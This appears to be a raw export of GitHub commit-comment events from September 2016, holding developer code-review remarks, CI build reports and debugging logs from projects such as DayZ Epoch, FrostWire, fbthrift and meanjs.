{"id":"4552024994","type":"CommitCommentEvent","actor":{"login":"oiad"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18992029,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T21:31:45Z","updated_at":"2016-09-12T21:31:45Z","body":"His blocking of null sources negates fall damage. I have had to remove that on my server since players were falling 200m and running away with not a scratch\n\nOn 13 September 2016 8:43:43 AM NZST, ebaydayz <notifications@github.com> wrote:\n>What explosion types besides vehicles blowing up cause a null source?\n>Hand grenades and any thrown item will not have a null source (source\n>will be the throwing player). Satchels and mines are not a null source\n>either, they have a source of the player who placed them. Explosions\n>from vehicle missiles and bombs will have a damage source of the\n>vehicle driver/commander. You can get this info easily via:\n>```sqf\n>player addEventHandler [\"HandleDamage\",{systemChat str(_this); diag_log\n>str(_this);}];\n>```\n>Infistar blocks all damage from null sources in his damage handler and\n>AFAIK it doesn't cause any major problems. In this case we are only\n>blocking it when there isn't a moving vehicle in close vicinity.\n>\n>-- \n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/EpochModTeam/DayZ-Epoch/commit/a09e364ec12e9fb48dfa0b4dda217b77e9e04938#commitcomment-18991404\n"}},"created_at":"2016-09-12T21:31:45Z"}
{"id":"4552025794","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18992033,"position":16,"line":542,"path":"src/librustc/ty/context.rs","commit_id":"16b7e56cde7784d736fe83f1344028c93bbaf635","created_at":"2016-09-12T21:31:54Z","updated_at":"2016-09-12T21:31:54Z","body":"Nit: can you put each parameter plus the return type on its own line, and make `&Vec<DisambiguatedDefPathData>` into `&[DisambiguatedDefPathData]`?"}},"created_at":"2016-09-12T21:31:54Z"}
{"id":"4552028501","type":"CommitCommentEvent","actor":{"login":"vbjay"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":18992037,"position":4,"line":20,"path":"ConEmuWinForms/Util/CommandLineBuilder.cs","commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-12T21:32:25Z","updated_at":"2016-09-12T21:32:25Z","body":"I like that idea.\n\nOn Mon, Sep 12, 2016, 5:29 PM ArsenShnurkov <notifications@github.com>\nwrote:\n\n> 4.6 in it's current source -\n> https://github.com/Microsoft/msbuild/blob/7992abc02c44260f374c1a8cd781a1d13fba17c4/src/nuget/Microsoft.Build.Utilities.Core.nuspec#L25\n> One can also create a separate package for CommandLineBuilder (for 4.0\n> framework, with custom .csproj and .nuspec) which could be reused in both\n> projects.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Maximus5/conemu-inside/commit/857eb7c45f0ded41eab214faa36d13fe7c9960d2#commitcomment-18991997>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADdhsd5xkBbMYMjqI5VwWUCdWGd2mF3Iks5qpcRJgaJpZM4JTmn8>\n> .\n>\n"}},"created_at":"2016-09-12T21:32:25Z"}
{"id":"4552028918","type":"CommitCommentEvent","actor":{"login":"danielinux"},"repo":{"name":"akanouras/pepsal"},"payload":{"comment":{"id":18992038,"position":null,"line":null,"path":null,"commit_id":"6f6d33e60b539c9af57b62e7a7c3577838ff4cc6","created_at":"2016-09-12T21:32:30Z","updated_at":"2016-09-12T21:32:30Z","body":"a more efficient fix in danielinux/pepsal@648cab96bc512f"}},"created_at":"2016-09-12T21:32:30Z"}
{"id":"4552033713","type":"CommitCommentEvent","actor":{"login":"DerOrakel"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18992047,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-12T21:33:28Z","updated_at":"2016-09-12T21:33:28Z","body":"Should add I was using commit ed8129f"}},"created_at":"2016-09-12T21:33:28Z"}
{"id":"4552041268","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18992069,"position":null,"line":null,"path":null,"commit_id":"7c1dc8bcd5df1ace4b591d7e161f1fce6032db15","created_at":"2016-09-12T21:34:55Z","updated_at":"2016-09-12T21:34:55Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2308 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c1dc8bcd5df1ace4b591d7e161f1fce6032db15-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c1dc8bcd5df1ace4b591d7e161f1fce6032db15-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.59%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T21:34:55Z"}
{"id":"4552045589","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18992081,"position":null,"line":null,"path":null,"commit_id":"f6595bd1d13d7007089b21f5e704aa16375c1382","created_at":"2016-09-12T21:35:47Z","updated_at":"2016-09-12T21:35:47Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f6595bd1d13d7007089b21f5e704aa16375c1382-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f6595bd1d13d7007089b21f5e704aa16375c1382-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T21:35:47Z"}
{"id":"4552047432","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992089,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:36:12Z","updated_at":"2016-09-12T21:36:12Z","body":"I think there's a bug. It may have been there from the beginning.\r\n\r\nTo replicate:\r\n\r\n1. Make the frostwire version `6.3.4`\r\n2. Remove the `~/Library/Preferences/FrostWire5/updates` folder\r\n3. Compile and run.\r\n\r\nYou will see the .torrent download output, but after the torrent finishes you will not get the update dialog, unless:\r\na) You click on Tools > Check for updates\r\nor\r\nb) You restart.\r\n\r\nIt'd be awesome if this was an existing bug because fixing will increase our update rates."}},"created_at":"2016-09-12T21:36:12Z"}
{"id":"4552048124","type":"CommitCommentEvent","actor":{"login":"malverde"},"repo":{"name":"Sparkpin/toontown-offline-sign"},"payload":{"comment":{"id":18992092,"position":null,"line":null,"path":null,"commit_id":"febc3183fb8599cb706b30f0b0bd603c5ae6e457","created_at":"2016-09-12T21:36:19Z","updated_at":"2016-09-12T21:36:19Z","body":"Guess who's back, back again\r\nCraigy's Back tell a friend"}},"created_at":"2016-09-12T21:36:19Z"}
{"id":"4552048350","type":"CommitCommentEvent","actor":{"login":"AWWebDesign"},"repo":{"name":"AWWebDesign/CARGO-site"},"payload":{"comment":{"id":18992093,"position":34,"line":1475,"path":"wp-content/themes/theme/css/cargo.css","commit_id":"e0cfefa70486d7b516e8038e28ca37d6c4ea6d45","created_at":"2016-09-12T21:36:21Z","updated_at":"2016-09-12T21:36:21Z","body":"Added ability for a \"Coming soon\" banner to be displayed on the corner of any card with this class to allow for placeholders to be created for undeveloped functionality"}},"created_at":"2016-09-12T21:36:21Z"}
{"id":"4552048452","type":"CommitCommentEvent","actor":{"login":"seanfarley"},"repo":{"name":"facebook/fbthrift"},"payload":{"comment":{"id":18992094,"position":null,"line":null,"path":null,"commit_id":"20164763fe0ac5ef16a413520e669db668282361","created_at":"2016-09-12T21:36:23Z","updated_at":"2016-09-12T21:36:23Z","body":"This fails for me with:\r\n\r\n```\r\nMaking all in compiler\r\n/Applications/Xcode.app/Contents/Developer/usr/bin/make  all-recursive\r\nMaking all in .\r\n/bin/sh ../build-aux/ylwrap thrifty.yy y.tab.c thrifty.cc y.tab.h `echo thrifty.cc | sed -e s/cc$/hh/ -e s/cpp$/hpp/ -e s/cxx$/hxx/ -e s/c++$/h++/ -e s/c$/h/` y.output thrifty.output -- bison -y -d\r\n/bin/sh ../build-aux/ylwrap thriftl.ll lex.yy.c thriftl.cc -- flex\r\ndepbase=`echo common.lo | sed 's|[^/]*$|.deps/&|;s|\\.lo$||'`;\\\r\n\t/bin/sh ../libtool  --tag=CXX   --mode=compile clang++ -DHAVE_CONFIG_H   -I../..  -pthread -I/opt/local/include -I/opt/local/include  -std=gnu++1y -MT common.lo -MD -MP -MF $depbase.Tpo -c -o common.lo common.cc &&\\\r\n\tmv -f $depbase.Tpo $depbase.Plo\r\ndepbase=`echo main.o | sed 's|[^/]*$|.deps/&|;s|\\.o$||'`;\\\r\n\tclang++ -DHAVE_CONFIG_H   -I../..  -pthread -I/opt/local/include -I/opt/local/include  -std=gnu++1y -MT main.o -MD -MP -MF $depbase.Tpo -c -o main.o main.cc &&\\\r\n\tmv -f $depbase.Tpo $depbase.Po\r\nmake[4]: *** No rule to make target `generate/templates/py3/CppNamespace.mustache', needed by `all-am'.  Stop.\r\nmake[4]: *** Waiting for unfinished jobs....\r\nlibtool: compile:  clang++ -DHAVE_CONFIG_H -I../.. -pthread -I/opt/local/include -I/opt/local/include -std=gnu++1y -MT common.lo -MD -MP -MF .deps/common.Tpo -c common.cc  -fno-common -DPIC -o .libs/common.o\r\nupdating thrifty.hh\r\nlibtool: compile:  clang++ -DHAVE_CONFIG_H -I../.. -pthread -I/opt/local/include -I/opt/local/include -std=gnu++1y -MT common.lo -MD -MP -MF .deps/common.Tpo -c common.cc -o common.o >/dev/null 2>&1\r\nmake[3]: *** [all-recursive] Error 1\r\nmake[2]: *** [all] Error 2\r\nmake[1]: *** [all-recursive] Error 1\r\nmake: *** [all] Error 2\r\n```"}},"created_at":"2016-09-12T21:36:23Z"}
{"id":"4552048902","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18992095,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T21:36:28Z","updated_at":"2016-09-12T21:36:28Z","body":"@oiad - Fall damage is handled correctly in this as you can see in the code. It's already been tested.\r\n\r\nThat is unrelated as the damage source from fall damage is not Null. It is the falling player. You can see that if you run the code I mentioned above and jump off a building."}},"created_at":"2016-09-12T21:36:28Z"}
{"id":"4552049068","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18992097,"position":45,"line":37,"path":"ui/app.jsx","commit_id":"c9012ec4255cfbe7237e4e655d7c80c5a21040e6","created_at":"2016-09-12T21:36:30Z","updated_at":"2016-09-12T21:36:30Z","body":"Still a typo here"}},"created_at":"2016-09-12T21:36:30Z"}
{"id":"4552050131","type":"CommitCommentEvent","actor":{"login":"mleanos"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18992101,"position":5,"line":25,"path":"modules/users/server/config/strategies/local.js","commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-12T21:36:43Z","updated_at":"2016-09-12T21:36:43Z","body":"Is there really a case to be made for having this? It just seems off to me. If we really needed a date to be passed back from this error handler it would probably be better to do:\r\n```javascript\r\nreturn done(null, false, {\r\n  message: 'Invalid username or password',\r\n  localTimeOccured: (new Date()).toLocaleTimeString()\r\n});\r\n```"}},"created_at":"2016-09-12T21:36:43Z"}
{"id":"4552051937","type":"CommitCommentEvent","actor":{"login":"volumio"},"repo":{"name":"volumio/Volumio2-UI"},"payload":{"comment":{"id":18992108,"position":13,"line":64,"path":"src/app/plugin/core-plugin/wifi-plugin.html","commit_id":"f6d84e522a874f1eebb526c9857602b243a10ab7","created_at":"2016-09-12T21:37:08Z","updated_at":"2016-09-12T21:37:08Z","body":"thx"}},"created_at":"2016-09-12T21:37:08Z"}
{"id":"4552052964","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18992111,"position":null,"line":null,"path":null,"commit_id":"2b0a46808b5bbadce4436f108b56a709a6a5ea6e","created_at":"2016-09-12T21:37:19Z","updated_at":"2016-09-12T21:37:19Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 26](http://teamcity.otenv.com/viewLog.html?buildId=5196733&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-12T21:37:19Z"}
{"id":"4552056186","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18992116,"position":null,"line":null,"path":null,"commit_id":"0e6bb3e3e5983d88a9cf0efc9a22ea6f17af9395","created_at":"2016-09-12T21:37:57Z","updated_at":"2016-09-12T21:37:57Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3926\n"}},"created_at":"2016-09-12T21:37:57Z"}
{"id":"4552056580","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992118,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:38:02Z","updated_at":"2016-09-12T21:38:02Z","body":"This is the output, we might also want to fix the `Completed: {completed}%` output\r\n\r\n```\r\nSep 12, 2016 3:33:43 PM BTEngine \r\nINFO: External IP: 71.229.168.203\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:1.0% Seeds:0 Peers:0 Downloaded:24612832 Uploaded:0 DSpeed:0 USpeed:0 TO:/Users/gubatron/workspace.frostwire/frostwire-tools/installer_builders/macosx/frostwire-dmg-jre8\r\n Completed:1.0% Seeds:0 Peers:0 Downloaded:24612832 Uploaded:0 DSpeed:0 USpeed:0 TO:/Users/gubatron/workspace.frostwire/frostwire-tools/installer_builders/macosx/frostwire-dmg-jre8\r\n Completed:1.0% Seeds:0 Peers:0 Downloaded:24612832 Uploaded:0 DSpeed:0 USpeed:0 TO:/Users/gubatron/workspace.frostwire/frostwire-tools/installer_builders/macosx/frostwire-dmg-jre8\r\n...\r\n<never changes>\r\n```\r\n"}},"created_at":"2016-09-12T21:38:02Z"}
{"id":"4552059186","type":"CommitCommentEvent","actor":{"login":"MrAE"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":18992126,"position":null,"line":null,"path":null,"commit_id":"c45b78dcaa35dce5c260be3b11d70f5a43c196ef","created_at":"2016-09-12T21:38:32Z","updated_at":"2016-09-12T21:38:32Z","body":"@jovo [Here's the html file](http://docs.neurodata.io/synaptome-stats/Code/mm20160912.html).\r\n\r\nEverything looks good. 👍 "}},"created_at":"2016-09-12T21:38:32Z"}
{"id":"4552060042","type":"CommitCommentEvent","actor":{"login":"ParkingTicketMachine"},"repo":{"name":"ParkingTicketMachine/BA1820"},"payload":{"comment":{"id":18992127,"position":4,"line":12,"path":"exercises_week1.Rmd","commit_id":"28eaccadd07d92e5f4ea54eb1e6f8bf92d9449ed","created_at":"2016-09-12T21:38:43Z","updated_at":"2016-09-12T21:38:43Z","body":"?"}},"created_at":"2016-09-12T21:38:43Z"}
{"id":"4552060584","type":"CommitCommentEvent","actor":{"login":"ParkingTicketMachine"},"repo":{"name":"ParkingTicketMachine/BA1820"},"payload":{"comment":{"id":18992130,"position":5,"line":12,"path":"exercises_week1.Rmd","commit_id":"28eaccadd07d92e5f4ea54eb1e6f8bf92d9449ed","created_at":"2016-09-12T21:38:49Z","updated_at":"2016-09-12T21:38:49Z","body":"(Y)"}},"created_at":"2016-09-12T21:38:49Z"}
{"id":"4552062465","type":"CommitCommentEvent","actor":{"login":"marcshilling"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18992133,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-12T21:39:10Z","updated_at":"2016-09-12T21:39:10Z","body":"@foghina is this not a breaking change? How can I make my module support `0.33` while also being backwards compatible?"}},"created_at":"2016-09-12T21:39:10Z"}
{"id":"4552063472","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992135,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:39:22Z","updated_at":"2016-09-12T21:39:22Z","body":"Ok, let me check that"}},"created_at":"2016-09-12T21:39:22Z"}
{"id":"4552064992","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992138,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:39:41Z","updated_at":"2016-09-12T21:39:41Z","body":"nvm, tried to replicate without successs a third time\r\ni think it must have been simply a networking issue."}},"created_at":"2016-09-12T21:39:41Z"}
{"id":"4552065406","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18992140,"position":null,"line":null,"path":null,"commit_id":"e8f41e0565f610b1b30dd4aab8f13230a373f1e1","created_at":"2016-09-12T21:39:45Z","updated_at":"2016-09-12T21:39:45Z","body":"Ok, then create a task please, and link it here to be able to see this."}},"created_at":"2016-09-12T21:39:45Z"}
{"id":"4552065562","type":"CommitCommentEvent","actor":{"login":"ggzengel"},"repo":{"name":"zfsonlinux/zfs"},"payload":{"comment":{"id":18992141,"position":null,"line":null,"path":null,"commit_id":"1f734a62ac8f8b9bb3b6e3ad5397fc94f205c0f6","created_at":"2016-09-12T21:39:47Z","updated_at":"2016-09-12T21:39:47Z","body":"> Fix new tunable to ignore hole_birth, enabled by default zfsonlinux/zfs#4833\r\nthat's wrong. It's disabled by default:\r\nhttps://github.com/zfsonlinux/zfs/search?utf8=%E2%9C%93&q=ignore_hole_birth\r\n\r\n"}},"created_at":"2016-09-12T21:39:47Z"}
{"id":"4552066009","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18992143,"position":null,"line":null,"path":null,"commit_id":"2b0a46808b5bbadce4436f108b56a709a6a5ea6e","created_at":"2016-09-12T21:39:53Z","updated_at":"2016-09-12T21:39:53Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 26](http://teamcity.otenv.com/viewLog.html?buildId=5196733&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:02:34"}},"created_at":"2016-09-12T21:39:53Z"}
{"id":"4552067373","type":"CommitCommentEvent","actor":{"login":"mleanos"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18992147,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-12T21:40:12Z","updated_at":"2016-09-12T21:40:12Z","body":"@wansco I really like that you re-organized the config into a \"shared\" section. This seems like a really helpful way of avoiding accidentally exposing sensitive server-side configurations. Thank you!!"}},"created_at":"2016-09-12T21:40:12Z"}
{"id":"4552069496","type":"CommitCommentEvent","actor":{"login":"alizrrao"},"repo":{"name":"alizrrao/DepthOfCoveragePerInterval"},"payload":{"comment":{"id":18992152,"position":null,"line":null,"path":null,"commit_id":"564fd30a9349187f215581b024eb288f5ce8f52f","created_at":"2016-09-12T21:40:38Z","updated_at":"2016-09-12T21:40:38Z","body":"Fixed bug causing crash after 1000+ intervals."}},"created_at":"2016-09-12T21:40:38Z"}
{"id":"4552069784","type":"CommitCommentEvent","actor":{"login":"mo0ojava"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18992153,"position":null,"line":null,"path":null,"commit_id":"db9065a0d44427fb10dfd057e3e239bb02b5cd11","created_at":"2016-09-12T21:40:42Z","updated_at":"2016-09-12T21:40:42Z","body":"There could still be some improvements to the login-part. PTC are down atm and that renders an Exception. Noting it here for future reference.\r\n![ptc-down-exception](https://cloud.githubusercontent.com/assets/20909700/18453989/3a0b7844-7942-11e6-877d-e2839ef09239.PNG)\r\n"}},"created_at":"2016-09-12T21:40:42Z"}
{"id":"4552069791","type":"CommitCommentEvent","actor":{"login":"adrianbroher"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":18992154,"position":null,"line":null,"path":null,"commit_id":"90e4768b91eb2275fac8075821109f72c7eaa4e0","created_at":"2016-09-12T21:40:42Z","updated_at":"2016-09-12T21:40:42Z","body":"@Vezzra requesting this commit to be cherry picked for release 0.4.6"}},"created_at":"2016-09-12T21:40:42Z"}
{"id":"4552070038","type":"CommitCommentEvent","actor":{"login":"rebornix"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18992156,"position":38,"line":669,"path":"src/actions/actions.ts","commit_id":"26e358e24b9b0dd05e01b6e7bc2cf6f7f1d73a38","created_at":"2016-09-12T21:40:45Z","updated_at":"2016-09-12T21:40:45Z","body":"Definitely :) Thanks for the careful review, you are amazing!"}},"created_at":"2016-09-12T21:40:45Z"}
{"id":"4552074764","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992171,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:41:42Z","updated_at":"2016-09-12T21:41:42Z","body":"it was ok for it not to show the dialog, the final download size isn't `24612832`, it should be `305649`\r\n\r\nnow I got this (in 2 tests):\r\n```\r\nINFO: Listen succeeded on endpoint: tcp:0.0.0.0:57154 type:UDP\r\nSep 12, 2016 3:41:10 PM BTEngine \r\nINFO: External IP: 71.229.168.203\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\nInstallerUpdater.stateChanged() - DOWNLOADING completed: false\r\nstateChanged(STATE_DOWNLOADING)\r\nInstallerUpdater.downloadComplete()!!!!\r\n Completed:0.107207% Seeds:1 Peers:1 Downloaded:32768 Uploaded:157 DSpeed:0 USpeed:0 TO:/Users/gubatron/Library/Preferences/FrostWire5/updates\r\n```\r\n"}},"created_at":"2016-09-12T21:41:42Z"}
{"id":"4552075860","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18992175,"position":5,"line":18,"path":"src/main/kotlin/org/rust/lang/core/psi/impl/RustStubbedElementImpl.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T21:41:55Z","updated_at":"2016-09-12T21:41:55Z","body":"My point was, if there is no test for this -- it still doesn't work. \r\nAnd i don't see any test for this around. If you verified this it shouldn't be hard to craft the test then."}},"created_at":"2016-09-12T21:41:55Z"}
